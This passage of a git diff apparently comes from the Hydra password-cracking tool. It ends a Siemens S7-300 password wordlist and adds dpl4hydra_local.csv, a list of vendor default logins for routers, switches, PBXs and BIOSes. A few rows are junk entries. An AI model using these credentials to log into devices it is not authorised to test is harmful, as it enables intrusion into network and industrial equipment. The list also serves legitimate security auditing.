s7-300,,,,,UUUUUUU,,, +siemens s7-300,,,,,uuuuuuuu,,, +siemens s7-300,,,,,UUUUUUUU,,, +siemens s7-300,,,,,v,,, +siemens s7-300,,,,,V,,, +siemens s7-300,,,,,vesoft,,, +siemens s7-300,,,,,VESOFT,,, +siemens s7-300,,,,,visual,,, +siemens s7-300,,,,,VISUAL,,, +siemens s7-300,,,,,vjqgfhjkm,,, +siemens s7-300,,,,,VJQGFHJKM,,, +siemens s7-300,,,,,vodka,,, +siemens s7-300,,,,,VODKA,,, +siemens s7-300,,,,,volition,,, +siemens s7-300,,,,,VOLITION,,, +siemens s7-300,,,,,vv,,, +siemens s7-300,,,,,VV,,, +siemens s7-300,,,,,vvv,,, +siemens s7-300,,,,,VVV,,, +siemens s7-300,,,,,vvvv,,, +siemens s7-300,,,,,VVVV,,, +siemens s7-300,,,,,vvvvv,,, +siemens s7-300,,,,,VVVVV,,, +siemens s7-300,,,,,vvvvvv,,, +siemens s7-300,,,,,VVVVVV,,, +siemens s7-300,,,,,vvvvvvv,,, +siemens s7-300,,,,,VVVVVVV,,, +siemens s7-300,,,,,vvvvvvvv,,, +siemens s7-300,,,,,VVVVVVVV,,, +siemens s7-300,,,,,w,,, +siemens s7-300,,,,,W,,, +siemens s7-300,,,,,W9F3,,, +siemens s7-300,,,,,webadmin,,, +siemens s7-300,,,,,WEBADMIN,,, +siemens s7-300,,,,,win,,, +siemens s7-300,,,,,WIN,,, +siemens s7-300,,,,,wincc,,, +siemens s7-300,,,,,WINCC,,, +siemens s7-300,,,,,winterm,,, +siemens s7-300,,,,,WINTERM,,, +siemens s7-300,,,,,Wireless,,, +siemens s7-300,,,,,WIRELESS,,, +siemens s7-300,,,,,wizard,,, +siemens s7-300,,,,,WIZARD,,, +siemens s7-300,,,,,wlsedb,,, +siemens s7-300,,,,,WLSEDB,,, +siemens s7-300,,,,,wolf,,, +siemens s7-300,,,,,WONF,,, +siemens s7-300,,,,,ww,,, +siemens s7-300,,,,,WW,,, +siemens s7-300,,,,,www,,, +siemens s7-300,,,,,WWW,,, +siemens s7-300,,,,,wwww,,, +siemens s7-300,,,,,WWWW,,, +siemens s7-300,,,,,wwwww,,, +siemens s7-300,,,,,WWWWW,,, +siemens s7-300,,,,,wwwwww,,, +siemens s7-300,,,,,WWWWWW,,, +siemens s7-300,,,,,wwwwwww,,, +siemens s7-300,,,,,WWWWWWW,,, +siemens s7-300,,,,,wwwwwwww,,, +siemens s7-300,,,,,WWWWWWWW,,, +siemens s7-300,,,,,wyse,,, +siemens s7-300,,,,,WYSE,,, +siemens s7-300,,,,,x,,, +siemens s7-300,,,,,X,,, +siemens s7-300,,,,,x40rocks,,, +siemens s7-300,,,,,X40ROCKS,,, +siemens s7-300,,,,,x-admin,,, +siemens s7-300,,,,,X-ADMIN,,, +siemens s7-300,,,,,xbox,,, +siemens s7-300,,,,,XBOX,,, +siemens s7-300,,,,,xlserver,,, +siemens s7-300,,,,,XLSERVER,,, +siemens s7-300,,,,,xx,,, +siemens s7-300,,,,,XX,,, +siemens s7-300,,,,,xxx,,, +siemens s7-300,,,,,XXX,,, +siemens s7-300,,,,,xxxx,,, +siemens s7-300,,,,,XXXX,,, +siemens s7-300,,,,,xxxxx,,, +siemens s7-300,,,,,XXXXX,,, +siemens s7-300,,,,,xxxxxx,,, +siemens s7-300,,,,,XXXXXX,,, +siemens s7-300,,,,,xxxxxxx,,, +siemens s7-300,,,,,XXXXXXX,,, +siemens s7-300,,,,,xxxxxxxx,,, +siemens s7-300,,,,,XXXXXXXX,,, +siemens s7-300,,,,,xxyyzz,,, +siemens s7-300,,,,,XXYYZZ,,, +siemens s7-300,,,,,y,,, +siemens s7-300,,,,,Y,,, +siemens s7-300,,,,,yxcv,,, +siemens s7-300,,,,,YXCV,,, +siemens s7-300,,,,,yy,,, +siemens s7-300,,,,,YY,,, +siemens s7-300,,,,,yyy,,, +siemens s7-300,,,,,YYY,,, +siemens s7-300,,,,,yyyy,,, +siemens s7-300,,,,,YYYY,,, +siemens s7-300,,,,,yyyyy,,, +siemens s7-300,,,,,YYYYY,,, +siemens s7-300,,,,,yyyyyy,,, +siemens s7-300,,,,,YYYYYY,,, +siemens s7-300,,,,,yyyyyyy,,, +siemens s7-300,,,,,YYYYYYY,,, +siemens s7-300,,,,,yyyyyyyy,,, +siemens s7-300,,,,,YYYYYYYY,,, +siemens s7-300,,,,,z,,, +siemens s7-300,,,,,Z,,, +siemens s7-300,,,,,z0ne,,, +siemens s7-300,,,,,Z0NE,,, +siemens s7-300,,,,,zettler,,, +siemens s7-300,,,,,ZETTLER,,, +siemens s7-300,,,,,zippo,,, +siemens s7-300,,,,,ZIPPO,,, +siemens s7-300,,,,,zone,,, +siemens s7-300,,,,,ZONE,,, +siemens s7-300,,,,,zoomadsl,,, +siemens s7-300,,,,,ZOOMADSL,,, +siemens s7-300,,,,,zorro,,, +siemens s7-300,,,,,ZORRO,,, +siemens s7-300,,,,,zorromen,,, +siemens s7-300,,,,,ZORROMEN,,, +siemens s7-300,,,,,zxc,,, +siemens s7-300,,,,,ZXC,,, +siemens s7-300,,,,,zxcv,,, +siemens s7-300,,,,,ZXCV,,, +siemens s7-300,,,,,zxcvb,,, +siemens s7-300,,,,,ZXCVB,,, +siemens s7-300,,,,,zxcvbn,,, +siemens s7-300,,,,,ZXCVBN,,, +siemens s7-300,,,,,zxcvbnm,,, +siemens s7-300,,,,,ZXCVBNM,,, +siemens s7-300,,,,,zxcvbnm,,,, +siemens s7-300,,,,,ZXCVBNM,,,, +siemens s7-300,,,,,zz,,, +siemens s7-300,,,,,ZZ,,, +siemens s7-300,,,,,zzz,,, +siemens s7-300,,,,,ZZZ,,, +siemens s7-300,,,,,zzzz,,, +siemens s7-300,,,,,ZZZZ,,, +siemens s7-300,,,,,zzzzz,,, +siemens s7-300,,,,,ZZZZZ,,, +siemens s7-300,,,,,zzzzzz,,, +siemens s7-300,,,,,ZZZZZZ,,, +siemens s7-300,,,,,zzzzzzz,,, +siemens s7-300,,,,,ZZZZZZZ,,, +siemens s7-300,,,,,zzzzzzzz,,, +siemens s7-300,,,,,ZZZZZZZZ,,, diff --git a/dpl4hydra_local.csv b/dpl4hydra_local.csv new file mode 100755 index 0000000..21bb776 --- /dev/null +++ b/dpl4hydra_local.csv @@ -0,0 +1,8807 @@ +2wire,Wireless Routers (most models),,http,,Wireless,Admin,, +360systems,Image Server 2000,,,factory,factory,,, +3com,,,,adm,,,, +3com,,,,admin,synnet,,, +3com,,,,manager,manager,,, +3com,,,,monitor,monitor,,, +3com,,,,read,synnet,,, +3com,,,,root,letmein,,1.25, +3com,,,,security,security,,, +3com,,,,write,synnet,,, +3com,3C16405,,,admin,,,, +3com,3C16405,,Console,Administrator,,Admin,, +3com,3C16405,,Multi,,,Admin,, +3com,3C16405,,Multi,admin,,Admin,, +3com,3C16406,,,admin,,,, +3com,3C16406,,Multi,admin,,Admin,telnet or serial, +3com,3C16450,,,admin,,,, +3com,3C16450,,Multi,admin,,Admin,telnet or serial, +3com,3CRADSL72 ,1.2,Multi,,1234admin,Admin,snmp open by default with public / private community, +3com,3CRWE52196,,,,admin,,, +3com,3Com SuperStack 3 Switch 3300XM,,,security,security,,, +3com,3Com SuperStack 3 Switch 3300XM,,Admin,security,security,,, +3com,3c16405,,,,,,, +3com,3c16405,,,Administrator,,,, +3com,812,,HTTP,Administrator,admin,Admin,, +3com,AirConnect AP,,,,comcomcom,,, +3com,AirConnect Access Point,,01.50-01,,,,, +3com,AirConnect Access Point,,Admin,,,,, +3com,AirConnect Access Point,,SNMP,,comcomcom,,, +3com,AirConnect Access Point,01.50-01,Multi,,,Admin,, +3com,Boson router simulator,3.66,HTTP,admin,admin,User,, +3com,CB9000 / 4007,3,Console,Type User: FORCE,,Admin,This will recover a lost password and reset the switch config to Factory Default, +3com,Cable Managment System SQL Database (DOSCIC DHCP),,,DOCSIS_APP,3com,,Win2000 & MS, +3com,CellPlex,,,admin,synnet,,, +3com,CellPlex,,7000,,,,, +3com,CellPlex,,7000,admin,admin,,, +3com,CellPlex,,7000,root,,,, +3com,CellPlex,,7000,tech,tech,,, +3com,CellPlex,,Admin,admin,synnet,,, +3com,CellPlex,,Admin,tech,tech,,, +3com,CellPlex,,HTTP,admin,synnet,Admin,, +3com,CellPlex,,Multi,,,Admin,, +3com,CellPlex,,Multi,admin,admin,Admin,, +3com,CellPlex,7000,Multi,admin,admin,Admin,RS-232/telnet, +3com,CellPlex,7000,Telnet,admin,admin,Admin,, +3com,CellPlex,7000,Telnet,operator,,Admin,, +3com,CellPlex,7000,Telnet,root,,Admin,, +3com,CellPlex,7000,Telnet,tech,,Admin,, +3com,CellPlex,7000,Telnet,tech,tech,Admin,, +3com,CoreBuilder 6000,,,debug,tech,,, +3com,CoreBuilder,,,debug,synnet,,, +3com,CoreBuilder,,,tech,tech,,, +3com,CoreBuilder,,7000/6000/3500/2500,debug,synnet,,, +3com,CoreBuilder,,7000/6000/3500/2500,tech,tech,,, +3com,CoreBuilder,7000/6000/3500/2500,Telnet,,,Admin,, +3com,CoreBuilder,7000/6000/3500/2500,Telnet,,admin,Admin,, +3com,CoreBuilder,7000/6000/3500/2500,Telnet,debug,synnet,,, +3com,CoreBuilder,7000/6000/3500/2500,Telnet,tech,tech,,, +3com,HiPerACT,,v4.1.x,admin,,,, +3com,HiPerARC,,Admin,adm,,,, +3com,HiPerARC,,v4.1.x,adm,,,, +3com,HiPerARC,v4.1.x,Telnet,adm,,,, +3com,HiPerARC,v4.1.x,Telnet,adm,,Admin,, +3com,HiPerARC,v4.1.x,Telnet,admin,,Admin,, +3com,Home Connect,,,User,Password,,, +3com,Internet Firewall,3C16770,HTTP,admin,password,Admin,, +3com,LANplex,,,debug,synnet,,, +3com,LANplex,,,tech,tech,,, +3com,LANplex,,2500,debug,synnet,,, +3com,LANplex,,2500,tech,,,, +3com,LANplex,,Admin,tech,,,, +3com,LANplex,2500,Telnet,debug,synnet,,, +3com,LANplex,2500,Telnet,tech,,Admin,, +3com,LANplex,2500,Telnet,tech,tech,,, +3com,LANplex/Corebuilder line,multiple models,,debug,synnet,,, +3com,LinkBuilder,,,,,,, +3com,LinkBuilder,,Admin,,,,, +3com,LinkBuilder,,Telnet,,,Admin,, +3com,LinkSwitch and CellPlex,,,debug,synnet,,, +3com,LinkSwitch and CellPlex,,,tech,tech,,, +3com,LinkSwitch,,,tech,tech,,, +3com,LinkSwitch,,2000/2700,tech,tech,,, +3com,LinkSwitch,2000/2700,Telnet,tech,tech,,, +3com,LinkSwitch,2700,,debug,synnet,,, +3com,Linkbuilder 3500,,,administer,administer,,, +3com,NAC (Network Access Card),,,adm,,,, +3com,NBX100,,,administrator,0,,2.8, +3com,NetBuilder,,,,ANYCOM,,, +3com,NetBuilder,,,,admin,,, +3com,NetBuilder,,SNMP,,ANYCOM,snmp-read,, +3com,NetBuilder,,SNMP,,ILMI,snmp-read,, +3com,NetBuilder,,SNMP,,admin,User,SNMP_READ, +3com,NetBuilder,,User,,admin,,, +3com,NetBuilder,,snmp-read,,ANYCOM,,, +3com,NetBuilder,,snmp-read,,ILMI,,, +3com,Netbuilder,,,Root,,,, +3com,Netbuilder,,,admin,,,, +3com,Netbuilder,,HTTP,Root,,Admin,http://10.1.0.1, +3com,Netbuilder,,Multi,admin,,Admin,, +3com,Office Connect ISDN Routers,,5x0,,PASSWORD,,, +3com,Office Connect ISDN Routers,,Admin,,PASSWORD,,, +3com,OfficeConnect 812 ADSL,,,adminttd,adminttd,,, +3com,OfficeConnect 812 ADSL,,01.50-01,admin,,,, +3com,OfficeConnect 812 ADSL,,Admin,admint|,admint|,,, +3com,OfficeConnect 812 ADSL,,Multi,adminttd,adminttd,Admin,, +3com,OfficeConnect 812 ADSL,01.50-01,Multi,admin,,Admin,, +3com,OfficeConnect ADSL Wireless 11g Firewall Router,3CRWDR100-72,HTTP,,admin,Admin,http://192.168.1.1, +3com,OfficeConnect ISDN Routers,5x0,Telnet,,PASSWORD,Admin,, +3com,OfficeConnect Remote 812,,,root,!root,,, +3com,OfficeConnect Remote 840,,,root,!root,,, +3com,OfficeConnect Remote Router,,812 ADSL 840 SDSL,root,!root,,, +3com,OfficeConnect Wireless 11g Cable/DSL Gateway,,,,admin,,, +3com,OfficeConnect Wireless 11g Cable/DSL Gateway,,HTTP,,admin,Admin,, +3com,OfficeConnect,,Multi,,,Admin,, +3com,OfficeConnect,11g,Multi,admin,,User,, +3com,Router,3000/5000 Series,Boot Prompt,,,Admin,, +3com,SS III Switch,,4xxx (4900 - sure),recovery,recovery,,, +3com,Shark Fin,Comcast-supplied,HTTP,User,Password,Diagnostics page,192.160.100.1, +3com,SuperStack 2700,,,tech,tech,,, +3com,SuperStack 3,,4400-49XX,manager,manager,,, +3com,SuperStack 3,,4XXX,admin,,,, +3com,SuperStack 3,,4XXX,monitor,monitor,,, +3com,SuperStack II Dual Speed 500,,,security,security,,, +3com,SuperStack II Netbuilder,11.1,Multi,,,Admin,, +3com,SuperStack II Switch 1100,,,manager,manager,,, +3com,SuperStack II Switch 1100,,,security,security,,, +3com,SuperStack II Switch 3300,,,manager,manager,,, +3com,SuperStack II Switch,,,debug,synnet,,, +3com,SuperStack II Switch,,,manager,manager,,Any, +3com,SuperStack II Switch,,,monitor,monitor,,Any, +3com,SuperStack II Switch,,,tech,password,,Any, +3com,SuperStack II Switch,,1100/3300,admin,,,, +3com,SuperStack II Switch,,1100/3300,manager,manager,,, +3com,SuperStack II Switch,,1100/3300,monitor,monitor,,, +3com,SuperStack II Switch,,1100/3300,security,security,,, +3com,SuperStack II Switch,,2200,debug,synnet,,, +3com,SuperStack II Switch,,2700,tech,tech,,, +3com,SuperStack II Switch,,Admin,tech,tech,,, +3com,SuperStack II Switch,1100/3300,Console,3comcso,RIP000,initialize,resets all pws to defaults, +3com,SuperStack II Switch,2200,Telnet,debug,synnet,,, +3com,SuperStack II Switch,2700,Telnet,tech,tech,Admin,, +3com,SuperStack II,,Console,,,Admin,, +3com,SuperStack III Switch,3300XM,Multi,security,security,Admin,, +3com,SuperStack III Switch,4400-49XX,Multi,manager,manager,User can access/change operational setting but not security settings,, +3com,SuperStack III Switch,4XXX,Multi,admin,,Admin,, +3com,SuperStack III Switch,4XXX,Multi,monitor,monitor,User,, +3com,SuperStack III Switch,4xxx (4900 - sure),Telnet,recovery,recovery,resets_all_to_default,u need to power off unit. tbl_ , +3com,SuperStack III Switch,4xxx (4900 - sure),console,recover,recover,Admin,, +3com,Superstack 3 switch,,4900,recover,recover,,, +3com,Switch 3000/3300,,,Admin,3com,,, +3com,Switch 3000/3300,,,admin,admin,,, +3com,Switch 3000/3300,,,manager,manager,,, +3com,Switch 3000/3300,,,monitor,monitor,,, +3com,Switch 3000/3300,,,security,security,,, +3com,Switch,,3300XM,admin,admin,,, +3com,Switch,3300XM,Multi,admin,admin,Admin,, +3com,US Robotics ADSL Router,,8550,,12345,,, +3com,Wireless AP,,,,comcomcom,,, +3com,Wireless AP,,ANY,admin,comcomcom,,, +3com,Wireless AP,,Admin,admin,comcomcom,,, +3com,Wireless AP,ANY,Multi,admin,comcomcom,Admin,Works on all 3com wireless APs, +3com,boson router simulator,,User,admin,admin,,, +3com,cellplex,,,,,,, +3com,cellplex,,7000,operator,,,, +3com,cellplex,,Admin,admin,admin,,, +3com,corebuilder,,7000,operator,admin,,, +3com,e960,3CRWDR100-72,Admin,Admin,Admin,HTTP,http://192.168.1.1, +3com,hub,,,,,,, +3com,hub,,Admin,,,,, +3com,hub,,Multi,,,Admin,, +3com,router,,,,,,, +3com,router,,Admin,,,,, +3com,super stack 2 switch,,,manager,manager,,, +3com,super stack II,,,,,,, +3com,super stack II,,Admin,,,,, +3com,super,,,admin,,,, +3com,superstack II,,1100/3300,3comcso,RIP000,,, +3com,superstack II,,initialize,3comcso,RIP000,,, +3m,VOL-0215 etc.,,,volition,volition,,, +3m,VOL-0215 etc.,,Admin,volition,volition,,, +3m,VOL-0215 etc.,,SNMP,volition,volition,Admin,Volition fiber switches, +3ware,3DM,,HTTP,Administrator,3ware,Admin,, +acc,Any router,,,netman,netman,,all, +acc,Congo/Amazon/Tigris,,,netman,netman,,All versions, +acc,Tigris Platform,All,Multi,public,,Guest,, +accelerated networks,DSL CPE and DSLAM,,,sysadm,anicust,,, +acceleratednetworks,DSL CPE and DSLAM,,Telnet,sysadm,anicust,,, +accton t_online,accton,,,,0,,, +accton,CheetahChassis Workgroup Switch,3714,SNMP/HTTP/Telnet,admin,,,, +accton,CheetahChassis Workgroup Switch,3714,SNMP/HTTP/Telnet,manager,manager,,, +accton,CheetahChassis Workgroup Switch,3714,SNMP/HTTP/Telnet,monitor,monitor,,, +accton,T-ONLINE,,aaaaaaa,,0,,, +accton,Wireless Router,T-online,HTTP,,0,Admin,, +accton,Wireless Router,T-online,HTTP,,0000,Admin,, +accton,Wirelessrouter,,T-online,,0,,, +aceex,Modem ADSL Router,,,admin,,,, +aceex,Modem ADSL Router,,HTTP,admin,,Admin,, +acer,517te,,,,,,, +acer,BIOS,,,,,,, +acer,BIOS,,Console,,,Admin,, +acer,Phoenix,,,,,,, +acer,acer,,,acer,acer,,, +acorp,all routers,,http,Admin,Admin,,, +actiontec,,,192.168.1.1,admin,password1,Admin,This the password commonly set by VZ Techs., +actiontec,GE344000-01 Router,,,,,,, +actiontec,GT701-GW,,Multi,admin,admin,,, +actiontec,GT701-WG,,192.168.1.1,admin,password,,, +actiontec,GT701-WG,,HTTP,admin,password,192.168.1.1,, +actiontec,gt701,,http://192.168.0.1,admin,,,, +actiontec,gt701-gw,,,admin,admin,,, +adaptec,RAID Controller,,,Administrator,adaptec,,, +adaptecraid,Storage Manager Pro,,,Administrator,adaptec,,All, +adc kentrox,Pacesetter Router,,,,secret,,, +adckentrox,Pacesetter Router,,Telnet,,secret,,, +adcompletecom,Ban Man Pro,,,Admin1,Admin1,,, +adic,24,,HTTP,admin,password,,, +adic,Scalar 100/1000,,HTTP,admin,secure,Admin,, +adic,Scalar i2000,,Multi,admin,password,Admin,, +adp,ADP Payroll Database,,,sys,adpadmin,,, +adp,ADP Payroll HR database,,Admin,sysadmin,master,,, +adp,ADP Payroll HR database,,All,sysadmin,master,,, +adp,ADP Payroll HR database,All,Multi,sysadmin,master,Admin,, +adtech,AX4000,,,root,ax400,,, +adtech,AX4000,,,root,ax400,Admin,, +adtran,Agent Card,,,,ADTRAN,,, +adtran,Agent Card,,Telnet,,ADTRAN,Admin,ctrl-PTT, +adtran,Atlas 800/800Plus/810Plus/550,,,,Password,,, +adtran,Atlas 800/800Plus/810Plus/550,,Telnet,,Password,Admin,crtl-L, +adtran,Express 5110/5200/5210,,,,adtran,,, +adtran,Express 5110/5200/5210,,Telnet,,adtran,Admin,hit enter a few times, +adtran,MX2800,,,,adtran,,, +adtran,MX2800,,Telnet,,adtran,Admin,hit enter a few times, +adtran,NetVanta 7100,,,admin,password,,, +adtran,NetVanta 7100,,Multi,admin,password,,, +adtran,NxIQ,,,,adtran,,, +adtran,NxIQ,,Telnet,,adtran,Admin,hit enter a few times, +adtran,Smart 16/16e,,,,PASSWORD,,, +adtran,Smart 16/16e,,Telnet,,,Admin,hit enter a few times, +adtran,Smart 16/16e,,Telnet,,PASSWORD,Admin,hit enter a few times, +adtran,T3SU 300,,,,adtran,,, +adtran,T3SU 300,,Telnet,,adtran,Admin,Hit enter a few times, +adtran,TSU IQ/DSU IQ,,,,,,, +adtran,TSU IQ/DSU IQ,,Telnet,,,Admin,hit enter a few times, +adtran,TSU Router Module/L128/L768/1.5,,,,,,, +adtran,TSU Router Module/L128/L768/1.5,,Telnet,,,Admin,hit enter a few times, +advanced integration,PC BIOS,,,,Advance,,, +advanced integration,PC BIOS,,Admin,,Advance,,, +advancedintegration,PC BIOS,,Console,,Advance,Admin,, +advanteknetworks,Wireless LAN 802.11 g/b,,Multi,admin,,Admin,, +aethra,Starbridge EU,,HTTP,admin,password,Admin,, +airlink plus,RTW026,,V0.80.0010 (firmware),,admin,,, +aironet,(All),,,,,,, +aironet,all products,all vers,,,,,, +airway,Transport,,,,0000,admin,, +aladdin,eSafe Appliance,,,root,kn1TG7psLu,,, +aladdin,eSafe Appliance,,Console/SSH,root,kn1TG7psLu,root,, +alcatel thomson,SpeedTouch580,,,admin,admin,,, +alcatel,4400,,Console,mtcl,,User,, +alcatel,4400,,Superuser,superuser,superuser,,, +alcatel,6224-24p,,console,admin,switch,,, +alcatel,OS6850-24p,,console,admin,switch,,, +alcatel,OXO,1.3,Multi,,admin,User,, +alcatel,Office 4200,,,,1064,,, +alcatel,Office 4200,,Admin,,1064,,, +alcatel,Office 4200,,Multi,,1064,Admin,, +alcatel,OmniPCX Office,,Admin,ftp_admi,kilo1987,,, +alcatel,OmniPCX Office,,Installer,ftp_inst,pbxk1064,,, +alcatel,OmniPCX Office,,NMC,ftp_nmc,tuxalize,,, +alcatel,OmniPCX Office,,Operator,ftp_oper,help1954,,, +alcatel,OmniPCX Office,4.1,FTP,ftp_admi,kilo1987,Admin,, +alcatel,OmniPCX Office,4.1,FTP,ftp_inst,pbxk1064,Installer,, +alcatel,OmniPCX Office,4.1,FTP,ftp_nmc,tuxalize,NMC,, +alcatel,OmniPCX Office,4.1,FTP,ftp_oper,help1954,Operator,, +alcatel,OmniPCX Office,4.1,Multi,ftp_admi,kilo1987,Admin,, +alcatel,OmniPCX Office,4.1,Other,ftp_inst,pbxk1064,Installer,, +alcatel,OmniPCX Office,4.1,Other,ftp_nmc,tuxalize,NMC,, +alcatel,OmniPCX Office,4.1,Other,ftp_oper,help1954,Operator,, +alcatel,OmniPCX,4.1 and above,Voicemail (User),,1515,,, +alcatel,OmniStack 6024,,,admin,switch,,, +alcatel,OmniStack 6024,,Admin,admin,switch,,, +alcatel,OmniStack 6024,,Telnet,admin,switch,Admin,, +alcatel,OmniStack/OmniSwitch,,Telnet,diag,switch,Admin,, +alcatel,OmniStack/OmniSwitch,,Telnet/Console,diag,switch,Admin,, +alcatel,Omnistack/Omniswitch,,,diag,switch,,, +alcatel,PBX,,4400,adfexc,adfexc,,, +alcatel,PBX,,4400,at4400,at4400,,, +alcatel,PBX,,4400,client,client,,, +alcatel,PBX,,4400,dhs3mt,dhs3mt,,, +alcatel,PBX,,4400,dhs3pms,dhs3pms,,, +alcatel,PBX,,4400,halt,tlah,,, +alcatel,PBX,,4400,install,llatsni,,, +alcatel,PBX,,4400,kermit,kermit,,, +alcatel,PBX,,4400,mtch,mtch,,, +alcatel,PBX,,4400,mtcl,mtcl,,, +alcatel,PBX,,4400,root,letacla,,, +alcatel,PBX,,unknown,adfexc,adfexc,,, +alcatel,PBX,,unknown,at4400,at4400,,, +alcatel,PBX,,unknown,client,client,,, +alcatel,PBX,,unknown,dhs3mt,dhs3mt,,, +alcatel,PBX,,unknown,dhs3pms,dhs3pms,,, +alcatel,PBX,,unknown,halt,tlah,,, +alcatel,PBX,,unknown,install,llatsni,,, +alcatel,PBX,,unknown,kermit,kermit,,, +alcatel,PBX,,unknown,mtch,mtch,,, +alcatel,PBX,,unknown,mtcl,mtcl,,, +alcatel,PBX,,unknown,root,letacla,,, +alcatel,PBX,4400,Port 2533,adfexc,adfexc,unknown,, +alcatel,PBX,4400,Port 2533,at4400,at4400,unknown,, +alcatel,PBX,4400,Port 2533,client,client,unknown,, +alcatel,PBX,4400,Port 2533,dhs3mt,dhs3mt,unknown,, +alcatel,PBX,4400,Port 2533,dhs3pms,dhs3pms,unknown,, +alcatel,PBX,4400,Port 2533,halt,tlah,shutdown,, +alcatel,PBX,4400,Port 2533,install,llatsni,unknown,, +alcatel,PBX,4400,Port 2533,kermit,kermit,unknown,, +alcatel,PBX,4400,Port 2533,mtch,mtch,unknown,, +alcatel,PBX,4400,Port 2533,mtcl,mtcl,unknown,, +alcatel,PBX,4400,Port 2533,root,letacla,unknown,, +alcatel,SpeedTouch 510,,HTTP/Telnet,,,,Default IP 192.168.1.254/24, +alcatel,SpeedTouch 580,4.3.19,HTTP,admin,admin,,, +alcatel,Speedtouch,,500 series,,,,, +alcatel,Timestep VPN 1520,3.00.026,Permit config and console,root,permit,Admin,Perm/Config port 38036, +alcatel,Timestep VPN Gateway 15xx/45xx/7xxx,,,root,permit,,Any, +allan,ass,,tool,tool,face,,, +allied telesyn,8326G,,,,,,, +allied telesyn,AT-8024(GB),,,,admin,,, +allied telesyn,AT-8024(GB),,,manager,admin,,, +allied telesyn,AT-8024(GB),,any,,admin,,, +allied telesyn,All,,Admin,manager,friend,,, +allied telesyn,All,,All,manager,friend,,, +allied telesyn,Generic Switch/Router,,,manager,friend,,, +allied telesyn,Generic Switch/Router,,Admin,manager,friend,,, +allied telesyn,Rapier G6 Switch,,,,manager,,, +allied telesyn,Switch,,AT-8124XL 1.0.3,admin,,,, +allied telesyn,Switch,,Admin,admin,,,, +allied,CJ8MO E-U,,,,,,, +allied,CJ8MO E-U,,Admin,,,,, +allied,CJ8MO E-U,,Telnet,,,Admin,, +allied,Telesyn,,,manager,friend,,, +allied,Telesyn,,,secoff,secoff,,, +allied,Telesyn,,Admin,manager,friend,,, +allied,Telesyn,,Admin,secoff,secoff,,, +allied-telesyn,AT-8550GB,,,manager,friend,,, +allied-telesyn,AT-RG613LH,,,manager,friend,,, +alliedtelesyn,ALAT8326GB,,Multi,manager,manager,Admin,, +alliedtelesyn,AT Router,,HTTP,root,,Admin,, +alliedtelesyn,AT-8024(GB),,Console,,admin,Admin,, +alliedtelesyn,AT-8024(GB),,HTTP,manager,admin,Admin,, +alliedtelesyn,AT-8550GB,,Telnet,manager,friend,,, +alliedtelesyn,AT-AR130 (U) -10,,HTTP,Manager,friend,Admin,Default IP is 192.168.242.242, +alliedtelesyn,AT-AR750S,,,manager,friend,,, +alliedtelesyn,AT-RG613LH,2-3_59,Telnet,manager,friend,,, +alliedtelesyn,AT8000S/24,v1.1.0.32,serial console,manager,friend,admin,, +alliedtelesyn,AT8016F,,Console,manager,friend,Admin,, +alliedtelesyn,All Routers,,,Manager,Friend,,Any, +alliedtelesyn,All,All,Telnet,manager,friend,Admin,, +alliedtelesyn,Allied Telesyn,AR410,,Administrator,admin,,, +alliedtelesyn,Generic Switch/Router,,Multi,manager,friend,Admin,, +alliedtelesyn,R130,,,Manager,friend,,, +alliedtelesyn,Rapier G6 Switch,,,manager,friend,,, +alliedtelesyn,Switch,AT-8124XL 1.0.3,Multi,admin,,Admin,, +alliedtelesyn,Various,,Multi,manager,friend,Admin,, +alliedtelesyn,Various,,Multi,secoff,secoff,Admin,, +alliedtelesyn,at-img634w,a+,multi,manager,friend,,, +alliedtelesyn,windows xp, AR410,http://192.168.1.174,admin,admin,user,HACK, +allnet,ALL0275 802.11g AP,,1.0.6,,admin,,, +allnet,ALL0275 802.11g AP,1.0.6,HTTP,,admin,Admin,, +allnet,ALL129DSL,,,admin,admin,,, +allnet,ALL129DSL,,,admin,admin,Administrator,Likely the default on all routers, +allnet,T-DSL Modem,,Software Version: v1.51,admin,admin,,, +allnet,T-DSL Modem,Software Version: v1.51 ,HTTP,admin,admin,Admin,, +allot,Netenforcer,,,admin,allot,,, +allot,Netenforcer,,,admin,allot,Admin,, +allot,Netenforcer,,,root,bagabu,,, +allot,Netenforcer,,,root,bagabu,Admin,, +alteon,ACEDirector3,,,admin,,,, +alteon,ACEDirector3,,console,admin,,,, +alteon,ACEswitch 180e (telnet),,,admin,blank,,, +alteon,ACEswitch,,,admin,,,, +alteon,ACEswitch,,180e,admin,,,, +alteon,ACEswitch,,Admin,admin,admin,,, +alteon,ACEswitch,,Admin,admin,linga,,, +alteon,ACEswitch,180e,HTTP,admin,admin,Admin,, +alteon,ACEswitch,180e,HTTP,admin,linga,Admin,, +alteon,AD4,9,Console,admin,admin,Admin,Factory default, +alteon,All hardware releases,,,,admin,,Web OS 5.2, +ambit,,,,admin,cableroot,root,, +ambit,ADSL,,,root,,,, +ambit,ADSL,,Admin,root,,,, +ambit,ADSL,,Telnet,root,,Admin,, +ambit,Cable Modem 60678eu,,1.12,root,root,,, +ambit,Cable Modem 60678eu,1.12,Multi,root,root,Admin,, +ambit,Cable Modem,,,root,root,,, +ambit,Cable Modem,,Multi,root,root,Admin,Time Warner Cable issued modem, +ambit,Cable Modem,,Multi,user,user,,, +ambit,DOCSIS 1.0/1.1/2.0 Compliant,5.66.1011,,user,,user,, +ambit,ntl:home 200,2.67.1011,HTTP,root,root,Admin,This is the cable modem supplied by NTL in the UK, +ami bios,1999,,AT 49,,,,, +ami,PC BIOS,,,,AMI.KEY,,, +ami,PC BIOS,,,,AMISETUP,,, +ami,PC BIOS,,Admin,,A.M.I,,, +ami,PC BIOS,,Admin,,AM,,, +ami,PC BIOS,,Admin,,AMI!SW,,, +ami,PC BIOS,,Admin,,AMI,,, +ami,PC BIOS,,Admin,,AMI.KEY,,, +ami,PC BIOS,,Admin,,AMI.KEZ,,, +ami,PC BIOS,,Admin,,AMI?SW,,, +ami,PC BIOS,,Admin,,AMIAMI,,, +ami,PC BIOS,,Admin,,AMIDECOD,,, +ami,PC BIOS,,Admin,,AMIPSWD,,, +ami,PC BIOS,,Admin,,AMISETUP,,, +ami,PC BIOS,,Admin,,AMI_SW,,, +ami,PC BIOS,,Admin,,AMI~,,, +ami,PC BIOS,,Admin,,BIOSPASS,,, +ami,PC BIOS,,Admin,,HEWITT RAND,,, +ami,PC BIOS,,Admin,,aammii,,, +ami,PC BIOS,,Console,,A.M.I,Admin,, +ami,PC BIOS,,Console,,AAAMMMIII,Admin,, +ami,PC BIOS,,Console,,AM,Admin,, +ami,PC BIOS,,Console,,AMI!SW,Admin,, +ami,PC BIOS,,Console,,AMI,Admin,, +ami,PC 